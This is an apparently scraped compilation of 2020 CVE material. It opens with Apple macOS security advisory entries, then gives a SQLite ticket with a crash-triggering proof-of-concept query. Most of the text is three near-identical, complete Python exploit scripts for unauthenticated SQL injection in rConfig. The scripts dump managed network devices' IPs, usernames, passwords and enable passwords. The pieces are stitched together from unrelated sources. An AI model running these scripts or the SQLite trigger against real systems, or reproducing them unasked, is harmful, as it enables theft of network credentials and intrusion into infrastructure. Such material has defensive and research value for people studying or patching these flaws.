Available for: macOS Mojave 10.14.6

Impact: A user may gain access to protected parts of the file system

Description: This issue was addressed with a new entitlement.

CVE-2020-9771: Csaba Fitzl (@theevilbit) of Offensive Security

**Security**

Available for: macOS Catalina 10.15.4

Impact: A file may be incorrectly rendered to execute JavaScript

Description: A validation issue was addressed with improved input sanitization.

CVE-2020-9788: Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated July 15, 2020

**Security**

Available for: macOS Catalina 10.15.4

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved validation.

CVE-2020-9854: Ilias Morad (A2nkF)

Entry added July 28, 2020

**SIP**

Available for: macOS Catalina 10.15.4

Impact: A non-privileged user may be able to modify restricted network settings

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9824: @jamestraynor, Csaba Fitzl (@theevilbit) of Offensive Security

Entry updated June 10, 2020

**Software Update**

Available for: macOS Catalina 10.15.4

Impact: A person with physical access to a Mac may be able to bypass Login Window

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9810: Francis @francisschmaltz

Entry added July 15, 2020

**SQLite**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may cause a denial of service or potentially disclose memory contents

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9794

**System Preferences**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with improved state handling.

CVE-2020-9839: @jinmo123, @setuid0x0\_, and @insu\_yun\_en of @SSLab\_Gatech working with Trend Micro’s Zero Day Initiative

**USB Audio**

Available for: macOS Catalina 10.15.4

Impact: A USB device may be able to cause a denial of service

Description: A validation issue was addressed with improved input sanitization.

CVE-2020-9792: Andy Davis of NCC Group

**Wi-Fi**

Available for: macOS Catalina 10.15.4

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: A double free issue was addressed with improved memory management.

CVE-2020-9844: Ian Beer of Google Project Zero

**Wi-Fi**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9830: Tielei Wang of Pangu Lab

**Wi-Fi**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2020-9834: Yu Wang of Didi Research America

**Wi-Fi**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A local user may be able to read kernel memory

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2020-9833: Yu Wang of Didi Research America

**Wi-Fi**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to determine kernel memory layout

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9832: Yu Wang of Didi Research America

**WindowServer**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An integer overflow was addressed with improved input validation.

CVE-2020-9841: ABC Research s.r.o. working with Trend Micro Zero Day Initiative

**zsh**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A local attacker may be able to elevate their privileges

Description: An authorization issue was addressed with improved state management.

CVE-2019-20044: Sam Foxman

CVE-2020-9817: About the security content of macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra

A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges.

CVE-2020-9830: About the security content of macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra

SQLite 3.32.2 has a use-after-free in resetAccumulator in select.c because the parse tree rewrite for window functions is too late.

Overview

Artifact ID:

cd708fa84d2aaaeacf8fdbef6d594742d061bedc0a2553e4930849abb4adf692

Ticket:

c8d3b9f0a750a529ec2f991aa9c8f0d68699f263  
Use after free in resetAccumulator.

User & Date:

yongheng on 2020-06-05 01:52:37

Changes

1.  icomment:
    
    > Release version is affected.
    > 
    > POC:
    > ---
    > CREATE TABLE a(b);
    > SELECT(SELECT b FROM a GROUP BY b HAVING(NULL AND b IN((SELECT COUNT() OVER(ORDER BY b) = lead(b) OVER(ORDER BY 3.100000 \* SUM(DISTINCT CASE WHEN b LIKE 'SM PACK' THEN b \* b ELSE 0 END) / b))))) FROM a EXCEPT SELECT b FROM a ORDER BY b, b, b;
    > ---
    
2.  login: "yongheng"
3.  mimetype: "text/plain"
4.  severity changed to: "Important"
5.  status changed to: "Open"
6.  title changed to: "Use after free in resetAccumulator."
7.  type changed to: "Code\_Defect"

CVE-2020-13871: SQLite: Ticket Change Details

PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE.

CVE-2020-13692

rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

Permalink

#!/usr/bin/python3

\# CVE-2020-10546

\# author https://github.com/theguly/

#

\# this method is very similar to one already published by v1k1ngfr for his CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig)

\# as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user

#

\# i wanted to have different py script foreach CVE, to have a proper listing on github.

\# i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it.

#

\# tested with rConfig < 3.9.7

import sys

import requests

import urllib3

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

burl \= """/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+%s"""

ulen \= 3

if len(sys.argv) < 2:

print('use: ./{} target'.format(sys.argv\[0\]))

print('./{} https://1.2.3.4/'.format(sys.argv\[0\]))

sys.exit()

url \= sys.argv\[1\] + burl

s \= requests.Session()

s.verify \= False

def getInfo(purl):

r \= s.get(purl)

if '\[PWN\]' in str(r.text):

ret \= str(r.text).split('\[PWN\]')\[1\]

return ret

else:

return False

def askContinue(msg):

c \= input('\[-\] '+msg+' (Y/n)')

if 'n' in c.lower():

sys.exit()

\# find current db name

print("\[+\] extracting rconfig db: ",end\='')

payload \= "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL"\*(ulen \- 1)+"+--+"

purl \= url % payload

dbname \= getInfo(purl)

print(dbname)

\# dump all devices ip,username,password,enablepass

print("\[+\] dumping nodes: ")

print('devicename:ip:username:password:enablepass')

print('------------------------------------------')

i\=0

while True:

if i \> 0 and not i % 10:

askContinue('Continue?')

payload \="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"+dbname+".nodes+limit+"+str(i)+","+str(i+1)+")"+",NULL"\*(ulen \- 1)+"+--+"

purl \= url % payload

n \= getInfo(purl)

if not n:

askContinue('it could be possible that we don\\'t have more devices. continue?')

print(n)

i \= i + 1

sys.exit()

CVE-2020-10546: exploits/CVE-2020-10546.py at master · theguly/exploits

rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

Permalink

Cannot retrieve contributors at this time

#!/usr/bin/python3

\# CVE-2020-10548

\# author https://github.com/theguly/

#

\# this method is very similar to one already published by v1k1ngfr for his CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig)

\# as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user

#

\# i wanted to have different py script foreach CVE, to have a proper listing on github.

\# i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it.

#

\# tested with rConfig < 3.9.6

import sys

import requests

import urllib3

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

burl \= """/devices.inc.php?search=True&searchField=antani'+%s&searchColumn=n.id&searchOption=contains"""

ulen \= 10

if len(sys.argv) < 2:

print('use: ./{} target'.format(sys.argv\[0\]))

print('./{} https://1.2.3.4/'.format(sys.argv\[0\]))

sys.exit()

url \= sys.argv\[1\] + burl

s \= requests.Session()

s.verify \= False

def getInfo(purl):

r \= s.get(purl)

if '\[PWN\]' in str(r.text):

ret \= str(r.text).split('\[PWN\]')\[1\]

return ret

else:

return False

def askContinue(msg):

c \= input('\[-\] '+msg+' (Y/n)')

if 'n' in c.lower():

sys.exit()

\# find current db name

print("\[+\] extracting rconfig db: ",end\='')

payload \= "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL" \* (ulen \- 1) +"+--+"

purl \= url % payload

dbname \= getInfo(purl)

print(dbname)

\# dump all devices ip,username,password,enablepass

print("\[+\] dumping nodes: ")

print('devicename:ip:username:password:enablepass')

print('------------------------------------------')

i\=0

while True:

if i \> 0 and not i % 10:

askContinue('Continue?')

payload \="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"+dbname+".nodes+limit+"+str(i)+","+str(i+1)+")"+",NULL" \* (ulen \- 1)+"+--+"

purl \= url % payload

n \= getInfo(purl)

if not n:

askContinue('it could be possible that we don\\'t have more devices. continue?')

print(n)

i \= i + 1

sys.exit()

CVE-2020-10548: exploits/CVE-2020-10548.py at master · theguly/exploits

rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

Permalink

Cannot retrieve contributors at this time

#!/usr/bin/python3

\# CVE-2020-10547

\# author https://github.com/theguly/

#

\# this method is very similar to one already published by v1k1ngfr for his CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig)

\# as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user

#

\# i wanted to have different py script foreach CVE, to have a proper listing on github.

\# i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it.

#

\# tested with rConfig < 3.9.6

import sys

import requests

import urllib3

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

burl \= """/compliancepolicyelements.inc.php?search=True&searchField=antani'+%s&searchColumn=elementName&searchOption=contains"""

ulen \= 5

if len(sys.argv) < 2:

print('use: ./{} target'.format(sys.argv\[0\]))

print('./{} https://1.2.3.4/'.format(sys.argv\[0\]))

sys.exit()

url \= sys.argv\[1\] + burl

s \= requests.Session()

s.verify \= False

def getInfo(purl):

r \= s.get(purl)

if '\[PWN\]' in str(r.text):

ret \= str(r.text).split('\[PWN\]')\[1\]

return ret

else:

return False

def askContinue(msg):

c \= input('\[-\] '+msg+' (Y/n)')

if 'n' in c.lower():

sys.exit()

\# find current db name

print("\[+\] extracting rconfig db: ",end\='')

payload \= "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL" \* (ulen \- 1) + "+--+"

purl \= url % payload

dbname \= getInfo(purl)

print(dbname)

\# dump all devices ip,username,password,enablepass

print("\[+\] dumping nodes: ")

print('devicename:ip:username:password:enablepass')

print('------------------------------------------')

i\=0

while True:

if i \> 0 and not i % 10:

askContinue('Continue?')

payload \="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"+dbname+".nodes+limit+"+str(i)+","+str(i+1)+")"+",NULL" \* (ulen \- 1) + "+--+"

purl \= url % payload

n \= getInfo(purl)

if not n:

askContinue('it could be possible that we don\\'t have more devices. continue?')

print(n)

i \= i + 1

sys.exit()

Tag

#sql